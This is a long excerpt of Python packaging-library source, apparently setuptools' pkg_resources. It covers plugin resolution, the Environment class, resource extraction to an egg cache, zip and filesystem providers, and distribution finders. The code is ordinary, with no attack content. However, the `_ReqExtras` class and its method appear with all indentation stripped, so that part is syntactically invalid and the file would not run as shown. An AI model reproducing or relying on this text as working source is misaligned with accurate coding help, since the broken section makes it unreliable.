        supplied, one is created automatically from the ``WorkingSet`` this
        method is called on, which will typically mean that every directory on
        ``sys.path`` will be scanned for distributions.

        `installer` is a standard installer callback as used by the
        ``resolve()`` method. The `fallback` flag indicates whether we should
        attempt to resolve older versions of a plugin if the newest version
        cannot be resolved.

        This method returns a 2-tuple: (`distributions`, `error_info`), where
        `distributions` is a list of the distributions found in `plugin_env`
        that were loadable, along with any other distributions that are needed
        to resolve their dependencies. `error_info` is a dictionary mapping
        unloadable plugin distributions to an exception instance describing the
        error that occurred. Usually this will be a ``DistributionNotFound`` or
        ``VersionConflict`` instance.
        """
        plugin_projects = list(plugin_env)
        # scan project names in alphabetic order
        plugin_projects.sort()

        error_info = {}
        distributions = {}

        if full_env is None:
            env = Environment(self.entries)
            env += plugin_env
        else:
            env = full_env + plugin_env

        shadow_set = self.__class__([])
        # put all our entries in shadow_set
        list(map(shadow_set.add, self))

        for project_name in plugin_projects:

            for dist in plugin_env[project_name]:

                req = [dist.as_requirement()]

                try:
                    resolvees = shadow_set.resolve(req, env, installer)

                except ResolutionError as v:
                    # save error info
                    error_info[dist] = v
                    if fallback:
                        # try the next older version of project
                        continue
                    else:
                        # give up on this project, keep going
                        break

                else:
                    list(map(shadow_set.add, resolvees))
                    distributions.update(dict.fromkeys(resolvees))

                    # success, no need to try any more versions of this project
                    break

        distributions = list(distributions)
        distributions.sort()

        return distributions, error_info

    def require(self, *requirements):
        """Ensure that distributions matching `requirements` are activated

        `requirements` must be a string or a (possibly-nested) sequence
        thereof, specifying the distributions and versions required.  The
        return value is a sequence of the distributions that needed to be
        activated to fulfill the requirements; all relevant distributions are
        included, even if they were already activated in this working set.
        """
        needed = self.resolve(parse_requirements(requirements))

        for dist in needed:
            self.add(dist)

        return needed

    def subscribe(self, callback, existing=True):
        """Invoke `callback` for all distributions

        If `existing=True` (default),
        call on all existing ones, as well.
        """
        if callback in self.callbacks:
            return
        self.callbacks.append(callback)
        if not existing:
            return
        for dist in self:
            callback(dist)

    def _added_new(self, dist):
        # Fan out a newly activated distribution to all subscribers.
        for callback in self.callbacks:
            callback(dist)

    def __getstate__(self):
        # Shallow-copy all bookkeeping so unpickling can't alias our state.
        return (
            self.entries[:], self.entry_keys.copy(), self.by_key.copy(),
            self.callbacks[:]
        )

    def __setstate__(self, e_k_b_c):
        entries, keys, by_key, callbacks = e_k_b_c
        self.entries = entries[:]
        self.entry_keys = keys.copy()
        self.by_key = by_key.copy()
        self.callbacks = callbacks[:]
class _ReqExtras(dict):
"""
Map each requirement to the extras that demanded it.
"""
def markers_pass(self, req):
"""
Evaluate markers for req against each extra that
demanded it.
Return False if the req has a marker and fails
evaluation. Otherwise, return True.
"""
extra_evals = (
req.marker.evaluate({'extra': extra})
for extra in self.get(req, ()) + (None,)
)
return not req.marker or any(extra_evals)
class Environment(object):
    """Searchable snapshot of distributions on a search path"""
    def __init__(self, search_path=None, platform=get_supported_platform(),
                 python=PY_MAJOR):
        """Snapshot distributions available on a search path
        Any distributions found on `search_path` are added to the environment.
        `search_path` should be a sequence of ``sys.path`` items.  If not
        supplied, ``sys.path`` is used.
        `platform` is an optional string specifying the name of the platform
        that platform-specific distributions must be compatible with.  If
        unspecified, it defaults to the current platform.  `python` is an
        optional string naming the desired version of Python (e.g. ``'3.3'``);
        it defaults to the current version.
        You may explicitly set `platform` (and/or `python`) to ``None`` if you
        wish to map *all* distributions, not just those compatible with the
        running platform or Python version.
        """
        # NOTE: the platform/python defaults are evaluated once, at class
        # definition time, which is fine because they describe the running
        # interpreter and do not change.
        # project key -> list of Distributions, kept newest-first by add()
        self._distmap = {}
        self.platform = platform
        self.python = python
        self.scan(search_path)
    def can_add(self, dist):
        """Is distribution `dist` acceptable for this environment?
        The distribution must match the platform and python version
        requirements specified when this environment was created, or False
        is returned.
        """
        # A ``None`` on either side of the python check acts as a wildcard.
        return (self.python is None or dist.py_version is None
                or dist.py_version == self.python) \
            and compatible_platforms(dist.platform, self.platform)
    def remove(self, dist):
        """Remove `dist` from the environment"""
        # Raises KeyError/ValueError if `dist` was never added.
        self._distmap[dist.key].remove(dist)
    def scan(self, search_path=None):
        """Scan `search_path` for distributions usable in this environment
        Any distributions found are added to the environment.
        `search_path` should be a sequence of ``sys.path`` items.  If not
        supplied, ``sys.path`` is used.  Only distributions conforming to
        the platform/python version defined at initialization are added.
        """
        if search_path is None:
            search_path = sys.path
        for item in search_path:
            for dist in find_distributions(item):
                self.add(dist)
    def __getitem__(self, project_name):
        """Return a newest-to-oldest list of distributions for `project_name`
        Uses case-insensitive `project_name` comparison, assuming all the
        project's distributions use their project's name converted to all
        lowercase as their key.
        """
        distribution_key = project_name.lower()
        return self._distmap.get(distribution_key, [])
    def add(self, dist):
        """Add `dist` if we ``can_add()`` it and it has not already been added
        """
        if self.can_add(dist) and dist.has_version():
            dists = self._distmap.setdefault(dist.key, [])
            if dist not in dists:
                dists.append(dist)
                # keep the per-project list ordered newest-first
                dists.sort(key=operator.attrgetter('hashcmp'), reverse=True)
    def best_match(self, req, working_set, installer=None):
        """Find distribution best matching `req` and usable on `working_set`
        This calls the ``find(req)`` method of the `working_set` to see if a
        suitable distribution is already active.  (This may raise
        ``VersionConflict`` if an unsuitable version of the project is already
        active in the specified `working_set`.)  If a suitable distribution
        isn't active, this method returns the newest distribution in the
        environment that meets the ``Requirement`` in `req`.  If no suitable
        distribution is found, and `installer` is supplied, then the result of
        calling the environment's ``obtain(req, installer)`` method will be
        returned.
        """
        dist = working_set.find(req)
        if dist is not None:
            return dist
        # newest-first iteration, so the first match is the best match
        for dist in self[req.key]:
            if dist in req:
                return dist
        # try to download/install
        return self.obtain(req, installer)
    def obtain(self, requirement, installer=None):
        """Obtain a distribution matching `requirement` (e.g. via download)
        Obtain a distro that matches requirement (e.g. via download).  In the
        base ``Environment`` class, this routine just returns
        ``installer(requirement)``, unless `installer` is None, in which case
        None is returned instead.  This method is a hook that allows subclasses
        to attempt other ways of obtaining a distribution before falling back
        to the `installer` argument."""
        if installer is not None:
            return installer(requirement)
    def __iter__(self):
        """Yield the unique project names of the available distributions"""
        for key in self._distmap.keys():
            # skip projects whose distribution lists have been emptied
            if self[key]:
                yield key
    def __iadd__(self, other):
        """In-place addition of a distribution or environment"""
        if isinstance(other, Distribution):
            self.add(other)
        elif isinstance(other, Environment):
            for project in other:
                for dist in other[project]:
                    self.add(dist)
        else:
            raise TypeError("Can't add %r to environment" % (other,))
        return self
    def __add__(self, other):
        """Add an environment or distribution to an environment"""
        # The result accepts everything (no platform/python filtering), so
        # no distribution from either operand is silently dropped.
        new = self.__class__([], platform=None, python=None)
        for env in self, other:
            new += env
        return new
# XXX backward compatibility: legacy alias for Environment
AvailableDistributions = Environment
class ExtractionError(RuntimeError):
    """An error occurred extracting a resource

    The following attributes are available from instances of this exception:

    manager
        The resource manager that raised this exception

    cache_path
        The base directory for resource extraction

    original_error
        The exception instance that caused extraction to fail
    """
class ResourceManager:
    """Manage resource extraction and packages"""
    # Base directory for extraction; None means use get_default_cache().
    extraction_path = None

    def __init__(self):
        # paths handed out by get_cache_path(), tracked for later cleanup
        self.cached_files = {}

    def resource_exists(self, package_or_requirement, resource_name):
        """Does the named resource exist?"""
        return get_provider(package_or_requirement).has_resource(resource_name)

    def resource_isdir(self, package_or_requirement, resource_name):
        """Is the named resource an existing directory?"""
        return get_provider(package_or_requirement).resource_isdir(
            resource_name
        )

    def resource_filename(self, package_or_requirement, resource_name):
        """Return a true filesystem path for specified resource"""
        return get_provider(package_or_requirement).get_resource_filename(
            self, resource_name
        )

    def resource_stream(self, package_or_requirement, resource_name):
        """Return a readable file-like object for specified resource"""
        return get_provider(package_or_requirement).get_resource_stream(
            self, resource_name
        )

    def resource_string(self, package_or_requirement, resource_name):
        """Return specified resource as a string"""
        return get_provider(package_or_requirement).get_resource_string(
            self, resource_name
        )

    def resource_listdir(self, package_or_requirement, resource_name):
        """List the contents of the named resource directory"""
        return get_provider(package_or_requirement).resource_listdir(
            resource_name
        )

    def extraction_error(self):
        """Give an error message for problems extracting file(s)"""
        # Must be called from inside an ``except`` block: the active
        # exception becomes ``original_error`` on the raised ExtractionError.
        old_exc = sys.exc_info()[1]
        cache_path = self.extraction_path or get_default_cache()
        tmpl = textwrap.dedent("""
            Can't extract file(s) to egg cache

            The following error occurred while trying to extract file(s) to the Python egg
            cache:

              {old_exc}

            The Python egg cache directory is currently set to:

              {cache_path}

            Perhaps your account does not have write access to this directory?  You can
            change the cache directory by setting the PYTHON_EGG_CACHE environment
            variable to point to an accessible directory.
            """).lstrip()
        err = ExtractionError(tmpl.format(**locals()))
        err.manager = self
        err.cache_path = cache_path
        err.original_error = old_exc
        raise err

    def get_cache_path(self, archive_name, names=()):
        """Return absolute location in cache for `archive_name` and `names`

        The parent directory of the resulting path will be created if it does
        not already exist.  `archive_name` should be the base filename of the
        enclosing egg (which may not be the name of the enclosing zipfile!),
        including its ".egg" extension.  `names`, if provided, should be a
        sequence of path name parts "under" the egg's extraction location.

        This method should only be called by resource providers that need to
        obtain an extraction location, and only for names they intend to
        extract, as it tracks the generated names for possible cleanup later.
        """
        extract_path = self.extraction_path or get_default_cache()
        target_path = os.path.join(extract_path, archive_name + '-tmp', *names)
        try:
            _bypass_ensure_directory(target_path)
        except Exception:
            # Fixed: was a bare ``except:``, which also swallowed
            # KeyboardInterrupt/SystemExit.  Directory creation failed
            # (permissions, read-only FS, ...) -- raise a user-friendly
            # ExtractionError carrying the original cause.
            self.extraction_error()
        self._warn_unsafe_extraction_path(extract_path)
        self.cached_files[target_path] = 1
        return target_path

    @staticmethod
    def _warn_unsafe_extraction_path(path):
        """
        If the default extraction path is overridden and set to an insecure
        location, such as /tmp, it opens up an opportunity for an attacker to
        replace an extracted file with an unauthorized payload.  Warn the user
        if a known insecure location is used.

        See Distribute #375 for more details.
        """
        if os.name == 'nt' and not path.startswith(os.environ['windir']):
            # On Windows, permissions are generally restrictive by default
            # and temp directories are not writable by other users, so
            # bypass the warning.
            return
        mode = os.stat(path).st_mode
        if mode & stat.S_IWOTH or mode & stat.S_IWGRP:
            msg = ("%s is writable by group/others and vulnerable to attack "
                "when "
                "used with get_resource_filename. Consider a more secure "
                "location (set with .set_extraction_path or the "
                "PYTHON_EGG_CACHE environment variable)." % path)
            warnings.warn(msg, UserWarning)

    def postprocess(self, tempname, filename):
        """Perform any platform-specific postprocessing of `tempname`

        This is where Mac header rewrites should be done; other platforms don't
        have anything special they should do.

        Resource providers should call this method ONLY after successfully
        extracting a compressed resource.  They must NOT call it on resources
        that are already in the filesystem.

        `tempname` is the current (temporary) name of the file, and `filename`
        is the name it will be renamed to by the caller after this routine
        returns.
        """
        if os.name == 'posix':
            # Make the resource executable
            mode = ((os.stat(tempname).st_mode) | 0o555) & 0o7777
            os.chmod(tempname, mode)

    def set_extraction_path(self, path):
        """Set the base path where resources will be extracted to, if needed.

        If you do not call this routine before any extractions take place, the
        path defaults to the return value of ``get_default_cache()``.  (Which
        is based on the ``PYTHON_EGG_CACHE`` environment variable, with various
        platform-specific fallbacks.  See that routine's documentation for more
        details.)

        Resources are extracted to subdirectories of this path based upon
        information given by the ``IResourceProvider``.  You may set this to a
        temporary directory, but then you must call ``cleanup_resources()`` to
        delete the extracted files when done.  There is no guarantee that
        ``cleanup_resources()`` will be able to remove all extracted files.

        (Note: you may not change the extraction path for a given resource
        manager once resources have been extracted, unless you first call
        ``cleanup_resources()``.)
        """
        if self.cached_files:
            raise ValueError(
                "Can't change extraction path, files already extracted"
            )
        self.extraction_path = path

    def cleanup_resources(self, force=False):
        """
        Delete all extracted resource files and directories, returning a list
        of the file and directory names that could not be successfully removed.
        This function does not have any concurrency protection, so it should
        generally only be called when the extraction path is a temporary
        directory exclusive to a single process.  This method is not
        automatically called; you must call it explicitly or register it as an
        ``atexit`` function if you wish to ensure cleanup of a temporary
        directory used for extractions.
        """
        # XXX  NOTE(review): intentionally unimplemented upstream -- it
        # currently returns None, not the documented list.
def get_default_cache():
    """
    Return the ``PYTHON_EGG_CACHE`` environment variable if set (and
    non-empty), otherwise a platform-appropriate user cache directory
    for an app named "Python-Eggs".
    """
    cache = os.environ.get('PYTHON_EGG_CACHE')
    if cache:
        return cache
    return appdirs.user_cache_dir(appname='Python-Eggs')
def safe_name(name):
    """Convert an arbitrary string to a standard distribution name.

    Any runs of non-alphanumeric/. characters are replaced with a single '-'.
    """
    cleaned = re.sub('[^A-Za-z0-9.]+', '-', name)
    return cleaned
def safe_version(version):
    """
    Convert an arbitrary string to a standard version string.
    """
    try:
        # prefer a fully PEP 440-normalized form when the version parses
        return str(packaging.version.Version(version))
    except packaging.version.InvalidVersion:
        # fall back to a lenient escaping of the raw string
        sanitized = version.replace(' ', '.')
        return re.sub('[^A-Za-z0-9.]+', '-', sanitized)
def safe_extra(extra):
    """Convert an arbitrary string to a standard 'extra' name.

    Any runs of non-alphanumeric characters are replaced with a single '_',
    and the result is always lowercased.
    """
    sanitized = re.sub('[^A-Za-z0-9.-]+', '_', extra)
    return sanitized.lower()
def to_filename(name):
    """Convert a project or version name to its filename-escaped form.

    Any '-' characters are currently replaced with '_'.
    """
    escaped = name.replace('-', '_')
    return escaped
def invalid_marker(text):
    """
    Validate text as a PEP 508 environment marker; return an exception
    if invalid or False otherwise.
    """
    try:
        evaluate_marker(text)
    except SyntaxError as e:
        # Strip location info that is meaningless for a marker string.
        e.filename = None
        e.lineno = None
        return e
    else:
        return False
def evaluate_marker(text, extra=None):
    """
    Evaluate a PEP 508 environment marker.

    Return a boolean indicating the marker result in this environment.
    Raise SyntaxError if marker is invalid.

    This implementation uses the 'pyparsing' module.
    """
    try:
        return packaging.markers.Marker(text).evaluate()
    except packaging.markers.InvalidMarker as e:
        # present marker problems uniformly as SyntaxError to callers
        raise SyntaxError(e)
class NullProvider:
    """Try to implement resources and metadata for arbitrary PEP 302 loaders"""
    # Filled in by egg-aware subclasses; None here means "not an egg".
    egg_name = None
    egg_info = None
    loader = None
    def __init__(self, module):
        self.loader = getattr(module, '__loader__', None)
        self.module_path = os.path.dirname(getattr(module, '__file__', ''))
    def get_resource_filename(self, manager, resource_name):
        return self._fn(self.module_path, resource_name)
    def get_resource_stream(self, manager, resource_name):
        # Wrap the raw bytes so callers always get a file-like object.
        return io.BytesIO(self.get_resource_string(manager, resource_name))
    def get_resource_string(self, manager, resource_name):
        return self._get(self._fn(self.module_path, resource_name))
    def has_resource(self, resource_name):
        return self._has(self._fn(self.module_path, resource_name))
    def has_metadata(self, name):
        return self.egg_info and self._has(self._fn(self.egg_info, name))
    def get_metadata(self, name):
        if not self.egg_info:
            return ""
        value = self._get(self._fn(self.egg_info, name))
        # metadata files are stored as UTF-8 bytes; decode on Python 3
        return value.decode('utf-8') if six.PY3 else value
    def get_metadata_lines(self, name):
        return yield_lines(self.get_metadata(name))
    def resource_isdir(self, resource_name):
        return self._isdir(self._fn(self.module_path, resource_name))
    def metadata_isdir(self, name):
        return self.egg_info and self._isdir(self._fn(self.egg_info, name))
    def resource_listdir(self, resource_name):
        return self._listdir(self._fn(self.module_path, resource_name))
    def metadata_listdir(self, name):
        if self.egg_info:
            return self._listdir(self._fn(self.egg_info, name))
        return []
    def run_script(self, script_name, namespace):
        """Execute the named script (from the egg's ``scripts/`` metadata
        directory) in the given namespace dict."""
        script = 'scripts/' + script_name
        if not self.has_metadata(script):
            raise ResolutionError("No script named %r" % script_name)
        # normalize Windows/Mac line endings before compiling
        script_text = self.get_metadata(script).replace('\r\n', '\n')
        script_text = script_text.replace('\r', '\n')
        script_filename = self._fn(self.egg_info, script)
        namespace['__file__'] = script_filename
        if os.path.exists(script_filename):
            # script is a real file on disk: execute from the file so
            # tracebacks and debuggers see the true source
            source = open(script_filename).read()
            code = compile(source, script_filename, 'exec')
            exec(code, namespace, namespace)
        else:
            # script exists only inside a zip: seed linecache so
            # tracebacks can still display source lines
            from linecache import cache
            cache[script_filename] = (
                len(script_text), 0, script_text.split('\n'), script_filename
            )
            script_code = compile(script_text, script_filename, 'exec')
            exec(script_code, namespace, namespace)
    # The _has/_isdir/_listdir primitives must be supplied by a subclass
    # registered for the concrete loader type.
    def _has(self, path):
        raise NotImplementedError(
            "Can't perform this operation for unregistered loader type"
        )
    def _isdir(self, path):
        raise NotImplementedError(
            "Can't perform this operation for unregistered loader type"
        )
    def _listdir(self, path):
        raise NotImplementedError(
            "Can't perform this operation for unregistered loader type"
        )
    def _fn(self, base, resource_name):
        # join a '/'-delimited resource name onto `base` using os separators
        if resource_name:
            return os.path.join(base, *resource_name.split('/'))
        return base
    def _get(self, path):
        if hasattr(self.loader, 'get_data'):
            return self.loader.get_data(path)
        raise NotImplementedError(
            "Can't perform this operation for loaders without 'get_data()'"
        )
# fallback provider for any otherwise-unregistered loader type
register_loader_type(object, NullProvider)
class EggProvider(NullProvider):
    """Provider based on a virtual filesystem"""

    def __init__(self, module):
        NullProvider.__init__(self, module)
        self._setup_prefix()

    def _setup_prefix(self):
        # Metadata may be nested inside a "basket" of multiple eggs, so walk
        # upward from module_path (rather than .archive) until an
        # unpacked-egg directory is found or the path stops shrinking.
        path = self.module_path
        previous = None
        while path != previous:
            if _is_unpacked_egg(path):
                self.egg_name = os.path.basename(path)
                self.egg_info = os.path.join(path, 'EGG-INFO')
                self.egg_root = path
                return
            previous, path = path, os.path.split(path)[0]
class DefaultProvider(EggProvider):
    """Provides access to package resources in the filesystem"""

    def _has(self, path):
        return os.path.exists(path)

    def _isdir(self, path):
        return os.path.isdir(path)

    def _listdir(self, path):
        return os.listdir(path)

    def get_resource_stream(self, manager, resource_name):
        return open(self._fn(self.module_path, resource_name), 'rb')

    def _get(self, path):
        with open(path, 'rb') as stream:
            return stream.read()

    @classmethod
    def _register(cls):
        # SourceFileLoader exists on Python 3.3+; fall back to type(None)
        # so registration is a harmless no-op elsewhere.
        loader_cls = getattr(
            importlib_machinery, 'SourceFileLoader', type(None))
        register_loader_type(loader_cls, cls)

DefaultProvider._register()
class EmptyProvider(NullProvider):
    """Provider that returns nothing for all requests"""
    module_path = None

    def __init__(self):
        # deliberately skip NullProvider.__init__: there is no module
        pass

    def _has(self, path):
        return False

    def _isdir(self, path):
        return False

    def _get(self, path):
        return ''

    def _listdir(self, path):
        return []

# shared singleton used wherever an "empty" provider is needed
empty_provider = EmptyProvider()
class ZipManifests(dict):
    """
    zip manifest builder
    """

    @classmethod
    def build(cls, path):
        """
        Build a dictionary similar to the zipimport directory
        caches, except instead of tuples, store ZipInfo objects.

        Use a platform-specific path separator (os.sep) for the path keys
        for compatibility with pypy on Windows.
        """
        with ContextualZipFile(path) as zfile:
            return {
                name.replace('/', os.sep): zfile.getinfo(name)
                for name in zfile.namelist()
            }

    load = build
class MemoizedZipManifests(ZipManifests):
    """
    Memoized zipfile manifests.
    """
    manifest_mod = collections.namedtuple('manifest_mod', 'manifest mtime')

    def load(self, path):
        """
        Load a manifest at path or return a suitable manifest already loaded.

        A cached entry is reused only while the zipfile's mtime is unchanged.
        """
        path = os.path.normpath(path)
        mtime = os.stat(path).st_mtime
        cached = self.get(path)
        if cached is None or cached.mtime != mtime:
            cached = self.manifest_mod(self.build(path), mtime)
            self[path] = cached
        return cached.manifest
class ContextualZipFile(zipfile.ZipFile):
    """
    Supplement ZipFile class to support context manager for Python 2.6
    """

    def __new__(cls, *args, **kwargs):
        """
        Construct a plain ZipFile when it already supports the context
        manager protocol; otherwise fall back to this subclass.
        """
        if hasattr(zipfile.ZipFile, '__exit__'):
            return zipfile.ZipFile(*args, **kwargs)
        return super(ContextualZipFile, cls).__new__(cls)

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, exc_tb):
        self.close()
class ZipProvider(EggProvider):
    """Resource support for zips and eggs"""
    # lazily-built list of resources that must always be extracted
    eagers = None
    # process-wide cache of zip manifests, shared by all instances
    _zip_manifests = MemoizedZipManifests()
    def __init__(self, module):
        EggProvider.__init__(self, module)
        self.zip_pre = self.loader.archive + os.sep
    def _zipinfo_name(self, fspath):
        # Convert a virtual filename (full path to file) into a zipfile subpath
        # usable with the zipimport directory cache for our target archive
        if fspath.startswith(self.zip_pre):
            return fspath[len(self.zip_pre):]
        raise AssertionError(
            "%s is not a subpath of %s" % (fspath, self.zip_pre)
        )
    def _parts(self, zip_path):
        # Convert a zipfile subpath into an egg-relative path part list.
        # pseudo-fs path
        fspath = self.zip_pre + zip_path
        if fspath.startswith(self.egg_root + os.sep):
            return fspath[len(self.egg_root) + 1:].split(os.sep)
        raise AssertionError(
            "%s is not a subpath of %s" % (fspath, self.egg_root)
        )
    @property
    def zipinfo(self):
        # maps zip subpaths to ZipInfo objects for this archive
        return self._zip_manifests.load(self.loader.archive)
    def get_resource_filename(self, manager, resource_name):
        """Extract the resource to the filesystem cache (if not already
        current) and return its real path."""
        if not self.egg_name:
            raise NotImplementedError(
                "resource_filename() only supported for .egg, not .zip"
            )
        # no need to lock for extraction, since we use temp names
        zip_path = self._resource_to_zip(resource_name)
        eagers = self._get_eager_resources()
        if '/'.join(self._parts(zip_path)) in eagers:
            # eager resources (e.g. native libs) must all be extracted
            # together before any one of them is used
            for name in eagers:
                self._extract_resource(manager, self._eager_to_zip(name))
        return self._extract_resource(manager, zip_path)
    @staticmethod
    def _get_date_and_size(zip_stat):
        size = zip_stat.file_size
        # ymdhms+wday, yday, dst
        date_time = zip_stat.date_time + (0, 0, -1)
        # 1980 offset already done
        timestamp = time.mktime(date_time)
        return timestamp, size
    def _extract_resource(self, manager, zip_path):
        # Directories are extracted by recursing into each child entry.
        if zip_path in self._index():
            for name in self._index()[zip_path]:
                last = self._extract_resource(
                    manager, os.path.join(zip_path, name)
                )
            # return the extracted directory name
            return os.path.dirname(last)
        timestamp, size = self._get_date_and_size(self.zipinfo[zip_path])
        if not WRITE_SUPPORT:
            raise IOError('"os.rename" and "os.unlink" are not supported '
                          'on this platform')
        try:
            real_path = manager.get_cache_path(
                self.egg_name, self._parts(zip_path)
            )
            if self._is_current(real_path, zip_path):
                return real_path
            # Extract to a temp name in the same directory, then rename into
            # place; this keeps concurrent extractors from seeing partial
            # files.
            outf, tmpnam = _mkstemp(".$extract", dir=os.path.dirname(real_path))
            os.write(outf, self.loader.get_data(zip_path))
            os.close(outf)
            # preserve the archive's timestamp so _is_current() can compare
            utime(tmpnam, (timestamp, timestamp))
            manager.postprocess(tmpnam, real_path)
            try:
                rename(tmpnam, real_path)
            except os.error:
                if os.path.isfile(real_path):
                    if self._is_current(real_path, zip_path):
                        # the file became current since it was checked above,
                        # so proceed.
                        return real_path
                    # Windows, del old file and retry
                    elif os.name == 'nt':
                        unlink(real_path)
                        rename(tmpnam, real_path)
                        return real_path
                raise
        except os.error:
            # report a user-friendly error
            manager.extraction_error()
        return real_path
    def _is_current(self, file_path, zip_path):
        """
        Return True if the file_path is current for this zip_path
        """
        timestamp, size = self._get_date_and_size(self.zipinfo[zip_path])
        if not os.path.isfile(file_path):
            return False
        stat = os.stat(file_path)
        if stat.st_size != size or stat.st_mtime != timestamp:
            return False
        # check that the contents match
        zip_contents = self.loader.get_data(zip_path)
        with open(file_path, 'rb') as f:
            file_contents = f.read()
        return zip_contents == file_contents
    def _get_eager_resources(self):
        # cached union of native_libs.txt and eager_resources.txt entries
        if self.eagers is None:
            eagers = []
            for name in ('native_libs.txt', 'eager_resources.txt'):
                if self.has_metadata(name):
                    eagers.extend(self.get_metadata_lines(name))
            self.eagers = eagers
        return self.eagers
    def _index(self):
        # Build (once) a directory index: parent subpath -> child names.
        try:
            return self._dirindex
        except AttributeError:
            ind = {}
            for path in self.zipinfo:
                parts = path.split(os.sep)
                while parts:
                    parent = os.sep.join(parts[:-1])
                    if parent in ind:
                        # ancestors already recorded; stop walking up
                        ind[parent].append(parts[-1])
                        break
                    else:
                        ind[parent] = [parts.pop()]
            self._dirindex = ind
            return ind
    def _has(self, fspath):
        zip_path = self._zipinfo_name(fspath)
        return zip_path in self.zipinfo or zip_path in self._index()
    def _isdir(self, fspath):
        # only directories appear as keys of the directory index
        return self._zipinfo_name(fspath) in self._index()
    def _listdir(self, fspath):
        return list(self._index().get(self._zipinfo_name(fspath), ()))
    def _eager_to_zip(self, resource_name):
        return self._zipinfo_name(self._fn(self.egg_root, resource_name))
    def _resource_to_zip(self, resource_name):
        return self._zipinfo_name(self._fn(self.module_path, resource_name))
register_loader_type(zipimport.zipimporter, ZipProvider)
class FileMetadata(EmptyProvider):
    """Metadata handler for standalone PKG-INFO files

    Usage::

        metadata = FileMetadata("/path/to/PKG-INFO")

    This provider serves no resources and exposes exactly one metadata
    entry, ``PKG-INFO``, whose content is whatever the file at the given
    location contains.
    """

    def __init__(self, path):
        self.path = path

    def has_metadata(self, name):
        # only PKG-INFO exists, and only while the backing file does
        return name == 'PKG-INFO' and os.path.isfile(self.path)

    def get_metadata(self, name):
        if name != 'PKG-INFO':
            raise KeyError("No metadata except PKG-INFO is available")
        with io.open(self.path, encoding='utf-8', errors="replace") as f:
            metadata = f.read()
        self._warn_on_replacement(metadata)
        return metadata

    def get_metadata_lines(self, name):
        return yield_lines(self.get_metadata(name))

    def _warn_on_replacement(self, metadata):
        # U+FFFD REPLACEMENT CHARACTER marks bytes that failed to decode.
        # (Spelled as encoded bytes for Python 2.6/3.2 compatibility.)
        replacement_char = b'\xef\xbf\xbd'.decode('utf-8')
        if replacement_char not in metadata:
            return
        tmpl = "{self.path} could not be properly decoded in UTF-8"
        msg = tmpl.format(**locals())
        warnings.warn(msg)
class PathMetadata(DefaultProvider):
    """Metadata provider for egg directories

    Usage::

        # Development eggs:

        egg_info = "/path/to/PackageName.egg-info"
        base_dir = os.path.dirname(egg_info)
        metadata = PathMetadata(base_dir, egg_info)
        dist_name = os.path.splitext(os.path.basename(egg_info))[0]
        dist = Distribution(base_dir, project_name=dist_name, metadata=metadata)

        # Unpacked egg directories:

        egg_path = "/path/to/PackageName-ver-pyver-etc.egg"
        metadata = PathMetadata(egg_path, os.path.join(egg_path,'EGG-INFO'))
        dist = Distribution.from_filename(egg_path, metadata=metadata)
    """
    def __init__(self, path, egg_info):
        # `path` is the directory the importable code lives in; `egg_info`
        # is the .egg-info / EGG-INFO directory holding the metadata files.
        self.module_path = path
        self.egg_info = egg_info
class EggMetadata(ZipProvider):
    """Metadata provider for .egg files"""

    def __init__(self, importer):
        """Create a metadata provider from a zipimporter"""
        # Bypass ZipProvider.__init__ (which expects a module); wire the
        # importer's archive details directly.
        self.zip_pre = importer.archive + os.sep
        self.loader = importer
        prefix = importer.prefix
        if prefix:
            self.module_path = os.path.join(importer.archive, prefix)
        else:
            self.module_path = importer.archive
        self._setup_prefix()
# Maps importer types to callables that yield distributions on a path item.
_declare_state('dict', _distribution_finders={})
def register_finder(importer_type, distribution_finder):
    """Register `distribution_finder` to find distributions in sys.path items

    `importer_type` is the type or class of a PEP 302 "Importer" (sys.path item
    handler), and `distribution_finder` is a callable that, passed a path
    item and the importer instance, yields ``Distribution`` instances found on
    that path item.  See ``pkg_resources.find_on_path`` for an example."""
    _distribution_finders[importer_type] = distribution_finder
def find_distributions(path_item, only=False):
    """Yield distributions accessible via `path_item`.

    The work is delegated to the finder registered for the importer type
    that handles `path_item`.
    """
    importer = get_importer(path_item)
    find = _find_adapter(_distribution_finders, importer)
    return find(importer, path_item, only)
def find_eggs_in_zip(importer, path_item, only=False):
    """
    Find eggs in zip files; possibly multiple nested eggs.
    """
    if importer.archive.endswith('.whl'):
        # wheels are not supported with this finder
        # they don't have PKG-INFO metadata, and won't ever contain eggs
        return
    metadata = EggMetadata(importer)
    if metadata.has_metadata('PKG-INFO'):
        yield Distribution.from_filename(path_item, metadata=metadata)
    if only:
        # don't yield nested distros
        return
    for subitem in metadata.resource_listdir('/'):
        if not _is_unpacked_egg(subitem):
            continue
        subpath = os.path.join(path_item, subitem)
        sub_importer = zipimport.zipimporter(subpath)
        for dist in find_eggs_in_zip(sub_importer, subpath):
            yield dist
register_finder(zipimport.zipimporter, find_eggs_in_zip)
def find_nothing(importer, path_item, only=False):
    """Finder for importer types that can never contain distributions."""
    return ()
# fallback finder for unrecognized importer types
register_finder(object, find_nothing)
def find_on_path(importer, path_item, only=False):
    """Yield distributions accessible on a sys.path directory"""
    path_item = _normalize_cached(path_item)
    if os.path.isdir(path_item) and os.access(path_item, os.R_OK):
        if _is_unpacked_egg(path_item):
            # the path item itself is an unpacked egg directory
            yield Distribution.from_filename(
                path_item, metadata=PathMetadata(
                    path_item, os.path.join(path_item, 'EGG-INFO')
                )
            )
        else:
            # scan for .egg and .egg-info in directory
            path_item_entries = os.listdir(path_item)
            # Reverse so we find the newest version of a distribution,
            path_item_entries.sort()
            path_item_entries.reverse()
            for entry in path_item_entries:
                lower = entry.lower()
                if lower.endswith('.egg-info') or lower.endswith('.dist-info'):
                    fullpath = os.path.join(path_item, entry)
                    if os.path.isdir(fullpath):
                        # egg-info directory, allow getting metadata
                        if len(os.listdir(fullpath)) == 0:
                            # Empty egg directory, skip.
                            continue
                        metadata = PathMetadata(path_item, fullpath)
                    else:
                        # single-file metadata (e.g. a bare PKG-INFO)
                        metadata = FileMetadata(fullpath)
                    yield Distribution.from_location(
                        path_item, entry, metadata, precedence=DEVELOP_DIST
                    )
                elif not only and _is_unpacked_egg(entry):
                    # recurse into the nested egg via the registered finders
                    dists = find_distributions(os.path.join(path_item, entry))
                    for dist in dists:
                        yield dist
                elif not only and lower.endswith('.egg-link'):
                    with open(os.path.join(path_item, entry)) as entry_file:
                        entry_lines = entry_file.readlines()
                    for line in entry_lines:
                        if not line.strip():
                            continue
                        path = os.path.join(path_item, line.rstrip())
                        dists = find_distributions(path)
                        for item in dists:
                            yield item
                        # only the first non-blank line of an .egg-link is used
                        break
